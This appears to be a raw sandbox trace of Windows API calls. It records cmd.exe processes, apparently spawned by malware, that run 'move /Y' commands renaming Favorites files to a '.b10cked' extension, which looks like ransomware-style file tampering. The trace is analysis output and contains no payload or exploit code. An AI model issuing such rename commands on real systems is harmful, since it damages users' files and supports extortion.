(_String1="REM", _String2="move") returned 5 [0213.928] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0214.093] GetConsoleTitleW (in: lpConsoleTitle=0x20f8d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.094] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0214.094] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0214.094] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0214.094] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0214.094] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0214.094] _wcsicmp (_String1="move", _String2="CD") returned 10 [0214.094] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0214.094] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0214.094] _wcsicmp (_String1="move", _String2="REN") returned -5 [0214.094] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0214.094] _wcsicmp (_String1="move", _String2="SET") returned -6 [0214.094] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0214.094] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0214.094] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0214.094] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0214.094] _wcsicmp (_String1="move", _String2="MD") returned 11 [0214.094] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0214.094] _wcsicmp (_String1="move", _String2="RD") returned -5 [0214.094] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0214.094] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0214.094] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0214.094] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0214.094] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0214.094] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0214.094] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0214.094] _wcsicmp (_String1="move", _String2="VER") returned -9 [0214.094] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0214.094] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0214.094] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0214.095] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0214.095] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0214.095] _wcsicmp (_String1="move", _String2="START") returned -6 [0214.095] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0214.095] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0214.095] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0214.096] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.096] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.096] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f68c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f684, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f684*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0214.097] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0214.098] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0214.098] _wcsicmp (_String1="MICROS~2.URL", _String2=".") returned 63 [0214.098] _wcsicmp (_String1="MICROS~2.URL", _String2="..") returned 63 [0214.098] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~2.URL" (normalized: "c:\\users\\default\\favori~1\\micros~1\\micros~2.url")) returned 0x20 [0214.098] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x391e90 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0214.098] SetErrorMode (uMode=0x0) returned 0x0 [0214.098] SetErrorMode (uMode=0x1) returned 0x0 [0214.098] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~2.URL", nBufferLength=0x104, lpBuffer=0x20f014, lpFilePart=0x20effc | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~2.URL", lpFilePart=0x20effc*="MICROS~2.URL") returned 0x2f [0214.098] SetErrorMode (uMode=0x0) returned 0x1 [0214.098] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1" (normalized: "c:\\users\\default\\favori~1\\micros~1")) returned 0x12 [0214.098] _wcsicmp (_String1="MICROS~2.URL", _String2=".") returned 63 [0214.098] _wcsicmp (_String1="MICROS~2.URL", _String2="..") returned 63 [0214.098] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~2.URL" (normalized: "c:\\users\\default\\favori~1\\micros~1\\micros~2.url")) returned 0x20 [0214.098] SetErrorMode (uMode=0x0) returned 0x0 [0214.098] SetErrorMode (uMode=0x1) returned 0x0 [0214.098] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~2.URL", nBufferLength=0x104, lpBuffer=0x20f490, lpFilePart=0x20f228 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~2.URL", lpFilePart=0x20f228*="MICROS~2.URL") returned 0x2f [0214.099] SetErrorMode (uMode=0x0) returned 0x1 [0214.099] SetErrorMode (uMode=0x0) returned 0x0 [0214.099] SetErrorMode (uMode=0x1) returned 0x0 [0214.099] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Home.url.b10cked", nBufferLength=0x104, lpBuffer=0x20f698, lpFilePart=0x20f228 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Home.url.b10cked", lpFilePart=0x20f228*="Microsoft At Home.url.b10cked") returned 0x40 [0214.099] SetErrorMode (uMode=0x0) returned 0x1 [0214.099] SetLastError (dwErrCode=0x0) [0214.099] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Home.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\micros~1\\microsoft at home.url.b10cked")) returned 0xffffffff [0214.099] GetLastError () returned 0x2 [0214.099] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~2.URL", fInfoLevelId=0x1, lpFindFileData=0x20eba4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20eba4) returned 0x380ef0 [0214.099] FindNextFileW (in: hFindFile=0x380ef0, lpFindFileData=0x20eba4 | out: lpFindFileData=0x20eba4) returned 0 [0214.099] GetLastError () returned 0x12 [0214.099] FindClose (in: hFindFile=0x380ef0 | out: hFindFile=0x380ef0) returned 1 [0214.100] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~2.URL", fInfoLevelId=0x1, lpFindFileData=0x391c30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x391c30) returned 0x380ef0 [0214.101] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Home.url.b10cked", nBufferLength=0x104, lpBuffer=0x20ee3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Home.url.b10cked", lpFilePart=0x0) returned 0x40 [0214.101] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Home.url", nBufferLength=0x104, lpBuffer=0x20ee3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Home.url", lpFilePart=0x0) returned 0x38 [0214.101] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Home.url" (normalized: "c:\\users\\default\\favori~1\\micros~1\\microsoft at home.url")) returned 0x20 [0214.101] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Home.url" (normalized: "c:\\users\\default\\favori~1\\micros~1\\microsoft at home.url"), lpNewFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Home.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\micros~1\\microsoft at home.url.b10cked"), dwFlags=0x3) returned 1 [0214.101] FindClose (in: hFindFile=0x380ef0 | out: hFindFile=0x380ef0) returned 1 [0214.101] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x20edf0 | out: _Buffer=" 1") returned 9 [0214.101] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.101] GetFileType (hFile=0x7) returned 0x2 [0214.102] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0214.102] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20ed7c | out: lpMode=0x20ed7c) returned 1 [0214.102] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.102] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20edb0 | out: lpConsoleScreenBufferInfo=0x20edb0) returned 1 [0214.102] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0214.102] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x20edf0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0214.102] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x20edd4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x20edd4*=0x1a) returned 1 [0214.103] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.103] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0214.103] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.103] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0214.103] _get_osfhandle (_FileHandle=0) returned 0x3 [0214.103] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0214.103] SetConsoleInputExeNameW () returned 0x1 [0214.103] GetConsoleOutputCP () returned 0x1b5 [0214.103] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0214.103] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.103] exit (_Code=0) Process: id = "526" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0x990" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~3.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Work.url.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31409 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31410 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31411 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31412 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 31413 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31414 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31415 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31416 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31417 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 31418 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31483 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31484 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31485 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31486 start_va = 0x380000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 31487 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 31488 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31489 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31490 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31491 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31492 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31493 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31494 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31495 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31496 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31497 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 31498 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31499 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31500 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31501 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 31502 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 31503 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 31504 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 31505 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 31506 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Thread: id = 727 os_tid = 0x958 [0213.728] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f7b4 | out: lpSystemTimeAsFileTime=0x20f7b4*(dwLowDateTime=0xb432b620, dwHighDateTime=0x1d440a9)) [0213.728] GetCurrentProcessId () returned 0x990 [0213.728] GetCurrentThreadId () returned 0x958 [0213.728] GetTickCount () returned 0x3be2f [0213.728] QueryPerformanceCounter (in: lpPerformanceCount=0x20f7ac | out: lpPerformanceCount=0x20f7ac*=27051717285) returned 1 [0213.729] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0213.729] __set_app_type (_Type=0x1) [0213.729] __p__fmode () returned 0x76b331f4 [0213.729] __p__commode () returned 0x76b331fc [0213.729] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0213.729] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0213.729] GetCurrentThreadId () returned 0x958 [0213.729] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x958) returned 0x38 [0213.729] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0213.729] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0213.729] SetThreadUILanguage (LangId=0x0) returned 0x409 [0213.730] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0213.730] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20f744 | out: phkResult=0x20f744*=0x0) returned 0x2 [0213.730] VirtualQuery (in: lpAddress=0x20f77b, lpBuffer=0x20f714, dwLength=0x1c | out: lpBuffer=0x20f714*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0213.730] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20f714, dwLength=0x1c | out: lpBuffer=0x20f714*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0213.730] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20f714, dwLength=0x1c | out: lpBuffer=0x20f714*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0213.730] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20f714, dwLength=0x1c | out: lpBuffer=0x20f714*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0213.730] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20f714, dwLength=0x1c | out: lpBuffer=0x20f714*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0213.730] GetConsoleOutputCP () returned 0x1b5 [0213.730] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0213.730] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0213.730] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.730] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0213.730] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.730] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0213.730] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.730] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0213.731] _get_osfhandle (_FileHandle=0) returned 0x3 [0213.731] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0213.731] _get_osfhandle (_FileHandle=0) returned 0x3 [0213.731] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0213.731] GetEnvironmentStringsW () returned 0x3e01b0* [0213.731] FreeEnvironmentStringsW (penv=0x3e01b0) returned 1 [0213.731] GetEnvironmentStringsW () returned 0x3e01b0* [0213.731] FreeEnvironmentStringsW (penv=0x3e01b0) returned 1 [0213.731] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e6b4 | out: phkResult=0x20e6b4*=0x40) returned 0x0 [0213.731] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e6bc, lpData=0x20e6c0, lpcbData=0x20e6b8*=0x1000 | out: lpType=0x20e6bc*=0x0, lpData=0x20e6c0*=0xe8, lpcbData=0x20e6b8*=0x1000) returned 0x2 [0213.731] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e6bc, lpData=0x20e6c0, lpcbData=0x20e6b8*=0x1000 | out: lpType=0x20e6bc*=0x4, lpData=0x20e6c0*=0x1, lpcbData=0x20e6b8*=0x4) returned 0x0 [0213.731] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e6bc, lpData=0x20e6c0, lpcbData=0x20e6b8*=0x1000 | out: lpType=0x20e6bc*=0x0, lpData=0x20e6c0*=0x1, lpcbData=0x20e6b8*=0x1000) returned 0x2 [0213.731] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e6bc, lpData=0x20e6c0, lpcbData=0x20e6b8*=0x1000 | out: lpType=0x20e6bc*=0x4, lpData=0x20e6c0*=0x0, lpcbData=0x20e6b8*=0x4) returned 0x0 [0213.731] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e6bc, lpData=0x20e6c0, lpcbData=0x20e6b8*=0x1000 | out: lpType=0x20e6bc*=0x4, lpData=0x20e6c0*=0x40, lpcbData=0x20e6b8*=0x4) returned 0x0 [0213.731] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e6bc, lpData=0x20e6c0, lpcbData=0x20e6b8*=0x1000 | out: lpType=0x20e6bc*=0x4, lpData=0x20e6c0*=0x40, lpcbData=0x20e6b8*=0x4) returned 0x0 [0213.731] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e6bc, lpData=0x20e6c0, lpcbData=0x20e6b8*=0x1000 | out: lpType=0x20e6bc*=0x0, lpData=0x20e6c0*=0x40, lpcbData=0x20e6b8*=0x1000) returned 0x2 [0213.731] RegCloseKey (hKey=0x40) returned 0x0 [0213.732] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e6b4 | out: phkResult=0x20e6b4*=0x40) returned 0x0 [0213.732] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e6bc, lpData=0x20e6c0, lpcbData=0x20e6b8*=0x1000 | out: lpType=0x20e6bc*=0x0, lpData=0x20e6c0*=0x40, lpcbData=0x20e6b8*=0x1000) returned 0x2 [0213.732] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e6bc, lpData=0x20e6c0, lpcbData=0x20e6b8*=0x1000 | out: lpType=0x20e6bc*=0x4, lpData=0x20e6c0*=0x1, lpcbData=0x20e6b8*=0x4) returned 0x0 [0213.732] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e6bc, lpData=0x20e6c0, lpcbData=0x20e6b8*=0x1000 | out: lpType=0x20e6bc*=0x0, lpData=0x20e6c0*=0x1, 